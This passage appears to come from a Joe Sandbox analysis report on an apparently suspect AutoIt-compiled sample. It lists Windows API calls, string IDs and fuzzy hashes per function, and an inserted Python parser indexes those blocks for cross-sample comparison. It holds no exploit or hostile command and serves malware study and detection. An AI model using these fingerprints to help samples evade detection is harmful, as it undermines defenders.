                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008F78B0
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008F78EE
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008F7900
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008F7946
                                                  • GetClientRect.USER32(00000000,?), ref: 008F7952
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008F7996
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008F79A5
                                                  • GetStockObject.GDI32(00000011), ref: 008F79B5
                                                  • SelectObject.GDI32(00000000,00000000), ref: 008F79B9
                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 008F79C9
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008F79D2
                                                  • DeleteDC.GDI32(00000000), ref: 008F79DB
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008F7A07
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 008F7A1E
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008F7A59
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008F7A6D
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 008F7A7E
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008F7AAE
                                                  • GetStockObject.GDI32(00000011), ref: 008F7AB9
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008F7AC4
                                                  • ShowWindow.USER32(00000004), ref: 008F7ACE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: 418729f3bf6cc0d68eb5d7a276bcbc5f6705bb50da048c573f2d696ad460bdc8
                                                  • Instruction ID: a9d56edcc0130b3b86231aa5572c322baf9e53d0eff25485d32c787663e28f13
                                                  • Opcode Fuzzy Hash: 418729f3bf6cc0d68eb5d7a276bcbc5f6705bb50da048c573f2d696ad460bdc8
                                                  • Instruction Fuzzy Hash: 0FA17EB1A54209BFEB14DBA8DC4AFAA7BB9FB45710F004114FA15E72E0D7B0AD00DB65
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EAF89
                                                  • GetDriveTypeW.KERNEL32(?,0090FAC0,?,\\.\,0090F910), ref: 008EB066
                                                  • SetErrorMode.KERNEL32(00000000,0090FAC0,?,\\.\,0090F910), ref: 008EB1C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: 0d9367730000a8aef2cb81a1b5d2b55c8521a0f7a57020848fa5cbcdde82ed70
                                                  • Instruction ID: b7bec85f668f0bce819747a6608378c5a09b1f86e767d0bffd133f29151024a1
                                                  • Opcode Fuzzy Hash: 0d9367730000a8aef2cb81a1b5d2b55c8521a0f7a57020848fa5cbcdde82ed70
                                                  • Instruction Fuzzy Hash: AA51C230A84389EBCB14EB16C9A287E73B1FB96769B204025E44BE7290C735AD41DF43
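The per-function blocks in this part of the report (the APIs list, the "$"-joined String ID, the API String ID and the Opcode/Instruction fuzzy hashes) are the fingerprint material an analyst pivots on between samples, for instance the GetDriveTypeW function above with its "PhysicalDrive"/"\\.\" string set, or the window-creation function titled "AutoIt v3". The following Python parser is an added example and is not part of the Joe Sandbox report or its tooling: it reads blocks in this layout into records, strips the "Download File" link text that the HTML export glues onto the Associated dump names, indexes records by Instruction Fuzzy Hash, and flags functions whose string set carries the AutoIt runtime tells the report itself lists ("AutoIt v3", "#OnAutoItStartRegister"). The sample text is a constructed excerpt condensed from blocks on this page; the hashing behind the IDs is Joe Sandbox's own and is not reproduced here.

```python
"""Parse Joe Sandbox per-function "Similarity" blocks into pivotable records.

Added example for this report page, not Joe Sandbox code. Layout assumptions
come from the blocks on the page: optional "APIs"/"Strings" bullets, then
"Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" bullets, with
"Instruction Fuzzy Hash" as the last bullet of every function record.
"""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# "• Key: value" bullets (Source File, Associated, API ID, String ID, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # anchor text the HTML export appends to Associated dump names
# Runtime tells listed by the report itself: the AutoIt window title and a script directive.
AUTOIT_TELLS = {"AutoIt v3", "#OnAutoItStartRegister"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (name, module, args, ref, from_subcall)
    fields: dict = field(default_factory=dict)  # bullet key -> value ("Associated" -> list)

    @property
    def strings(self):
        """The String ID bullet is a '$'-joined list of referenced strings."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def api_names(self):
        return {name for name, *_ in self.apis}


def parse_blocks(text):
    """Split report text into one FunctionRecord per Instruction Fuzzy Hash bullet."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in SECTION_HEADERS:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["mod"], m["args"] or "", m["ref"], m["sub"] is not None))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if val.endswith(LINK_RESIDUE):
            val = val[: -len(LINK_RESIDUE)].strip()
        if key == "Associated":
            cur.fields.setdefault(key, []).append(val)
        else:
            cur.fields[key] = val
        if key == "Instruction Fuzzy Hash":  # closes the record
            records.append(cur)
            cur = FunctionRecord()
    return records


def index_by_fuzzy_hash(records):
    """Instruction Fuzzy Hash -> records; the key to compare across samples."""
    index = {}
    for r in records:
        h = r.fields.get("Instruction Fuzzy Hash")
        if h:
            index.setdefault(h, []).append(r)
    return index


def functions_calling(records, api_name):
    return [r for r in records if api_name in r.api_names]


def find_autoit_markers(records):
    return [r for r in records if AUTOIT_TELLS & set(r.strings)]


# Constructed excerpt condensed from three function blocks on this page.
SAMPLE = r"""
APIs
• DestroyWindow.USER32(00000000), ref: 008F77F1
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008F7946
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008F79A5
Strings
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• Instruction Fuzzy Hash: 0FA17EB1A54209BFEB14DBA8DC4AFAA7BB9FB45710F004114FA15E72E0D7B0AD00DB65
APIs
• SetErrorMode.KERNEL32(00000001), ref: 008EAF89
• GetDriveTypeW.KERNEL32(?,0090FAC0,?,\\.\,0090F910), ref: 008EB066
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$Fixed$Network$PhysicalDrive$RAID$Removable$USB$Unknown$\\.\$iSCSI
• Instruction Fuzzy Hash: AA51C230A84389EBCB14EB16C9A287E73B1FB96769B204025E44BE7290C735AD41DF43
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#include$#include-once$#notrayicon$#requireadmin
• Instruction Fuzzy Hash: 3F812671640625AFDB24BB68CC82FEE3768FF16704F044025F945EA5C2FB60EA61C792
"""

if __name__ == "__main__":
    for r in parse_blocks(SAMPLE):
        print(r.fields.get("API ID") or "(no API ID)", sorted(r.api_names), len(r.strings))
```

Feed the full "Similarity" section of a report export to parse_blocks and the resulting Instruction Fuzzy Hash index gives a quick overlap check against a second sample's export, which is how the fuzzy hashes are meant to be used.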
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: 54f768cd051c49cbe873517eaa924c2f66c2319d0dee5f91a3aea4b1f08c0f39
                                                  • Instruction ID: a3bbd80fca14e279a4fc3de3e608b1aba6a146fb290b65fdfbe311f25a2e1454
                                                  • Opcode Fuzzy Hash: 54f768cd051c49cbe873517eaa924c2f66c2319d0dee5f91a3aea4b1f08c0f39
                                                  • Instruction Fuzzy Hash: 3F812671640625AFDB24BB68CC82FEE3768FF16704F044025F945EA5C2FB60EA61C792
                                                  APIs
                                                  • DestroyWindow.USER32 ref: 00882CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00882CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00882CF3
                                                  • DestroyCursor.USER32(00000000), ref: 00882CFE
                                                  • DestroyWindow.USER32(00000000), ref: 00882D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BC68B
                                                  • 69E7E349.COMCTL32(?,000000FF,?), ref: 008BC6C4
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008BCAED
                                                    • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00881B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 008BCB2A
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BCB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DestroyMessageSendWindow$DeleteObject$CursorE349InvalidateMoveRect
                                                  • String ID: 0
                                                  • API String ID: 2631842597-4108050209
                                                  • Opcode ID: 6499f40187223be9794e135255521587712eec4ea5448c57733b260af086fb69
                                                  • Instruction ID: 6a55959ed9f830acb15a4fe41b90247174fac8b3b47dbaa6cf021b07b75591aa
                                                  • Opcode Fuzzy Hash: 6499f40187223be9794e135255521587712eec4ea5448c57733b260af086fb69
                                                  • Instruction Fuzzy Hash: AD12AC70604205EFDB20DF28C984BA9BBE2FF05314F5445B9F896DB662CB31E842DB91
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 0090AB99
                                                  • SetTextColor.GDI32(?,?), ref: 0090AB9D
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                                                  • GetSysColor.USER32(0000000F), ref: 0090ABBE
                                                  • CreateSolidBrush.GDI32(?), ref: 0090ABC3
                                                  • GetSysColor.USER32(00000011), ref: 0090ABDB
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                                                  • SelectObject.GDI32(?,00000000), ref: 0090ABFA
                                                  • SetBkColor.GDI32(?,00000000), ref: 0090AC03
                                                  • SelectObject.GDI32(?,?), ref: 0090AC10
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090ACA7
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0090ACCE
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0090ACEC
                                                  • DrawFocusRect.USER32(?,?), ref: 0090ACF7
                                                  • GetSysColor.USER32(00000011), ref: 0090AD05
                                                  • SetTextColor.GDI32(?,00000000), ref: 0090AD0D
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0090AD21
                                                  • SelectObject.GDI32(?,0090A869), ref: 0090AD38
                                                  • DeleteObject.GDI32(?), ref: 0090AD43
                                                  • SelectObject.GDI32(?,?), ref: 0090AD49
                                                  • DeleteObject.GDI32(?), ref: 0090AD4E
                                                  • SetTextColor.GDI32(?,?), ref: 0090AD54
                                                  • SetBkColor.GDI32(?,?), ref: 0090AD5E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: ad5e71a83c847002f6eeca5d1371da1cd293fd7fc84eb6af71be179609b687d0
                                                  • Instruction ID: 02a87acc70f62f18426c1a9d3d9d880ca111ebee45f6c46f48de80e0c9cd9a0f
                                                  • Opcode Fuzzy Hash: ad5e71a83c847002f6eeca5d1371da1cd293fd7fc84eb6af71be179609b687d0
                                                  • Instruction Fuzzy Hash: E3615D71904218EFDF219FA8DC48EAE7BB9EF08320F114525F915AB2E1D6759A40EB90
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00908D34
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908D45
                                                  • CharNextW.USER32(0000014E), ref: 00908D74
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00908DB5
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00908DCB
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908DDC
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00908DF9
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00908E45
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00908E5B
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00908E8C
                                                  • _memset.LIBCMT ref: 00908EB1
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00908EFA
                                                  • _memset.LIBCMT ref: 00908F59
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00908F83
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00908FDB
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00909088
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 009090AA
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009090F4
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00909121
                                                  • DrawMenuBar.USER32(?), ref: 00909130
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00909158
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: afb4a7e2c889ee7c743a70c7f60fa2cd9b3b8800a7a2dbb3e42644baf2d43b2d
                                                  • Instruction ID: b2e9ae9ef2b3d0023e8aca059dc1e97f2696649d9b3f1b09a43617cb080eeded
                                                  • Opcode Fuzzy Hash: afb4a7e2c889ee7c743a70c7f60fa2cd9b3b8800a7a2dbb3e42644baf2d43b2d
                                                  • Instruction Fuzzy Hash: E0E1AD71A04219AEDF209F64CC88EEF7BB9FF05710F008259F955AA2D1DB748A81DF61
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00904C51
                                                  • GetDesktopWindow.USER32 ref: 00904C66
                                                  • GetWindowRect.USER32(00000000), ref: 00904C6D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00904CCF
                                                  • DestroyWindow.USER32(?), ref: 00904CFB
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00904D24
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00904D42
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00904D68
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00904D7D
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00904D90
                                                  • IsWindowVisible.USER32(?), ref: 00904DB0
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904DCB
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00904DDF
                                                  • GetWindowRect.USER32(?,?), ref: 00904DF7
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00904E1D
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00904E37
                                                  • CopyRect.USER32(?,?), ref: 00904E4E
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00904EB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                                                  • Instruction ID: ecc72c6dcd6cf85c512f67002a89b7531200fd950c0c56eb3c34ed51c2b5c3d2
                                                  • Opcode Fuzzy Hash: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                                                  • Instruction Fuzzy Hash: 0BB18CB1608341AFDB14DF28C944B6ABBE5FF84714F00891CF6999B2A1DB71ED05CB92
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 008828C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 008828F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 0088291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00882939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00882949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0088297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00882990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 008829AE
                                                  • GetStockObject.GDI32(00000011), ref: 008829CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 008829D5
                                                    • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                                    • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00881256), ref: 008829FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 269ef0adc8a7363fd3591c738f13bf6885c49e08567d72d8847cbf9f91bfed9f
                                                  • Instruction ID: 61d630acc803f640ddead317c8e8aa47f3b3ad750edc068a9a3079d88303e833
                                                  • Opcode Fuzzy Hash: 269ef0adc8a7363fd3591c738f13bf6885c49e08567d72d8847cbf9f91bfed9f
                                                  • Instruction Fuzzy Hash: 8AB18D71A0420AAFDB24EFA8DC55BEE7BB4FB08714F108129FA15E7390DB70A940DB51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
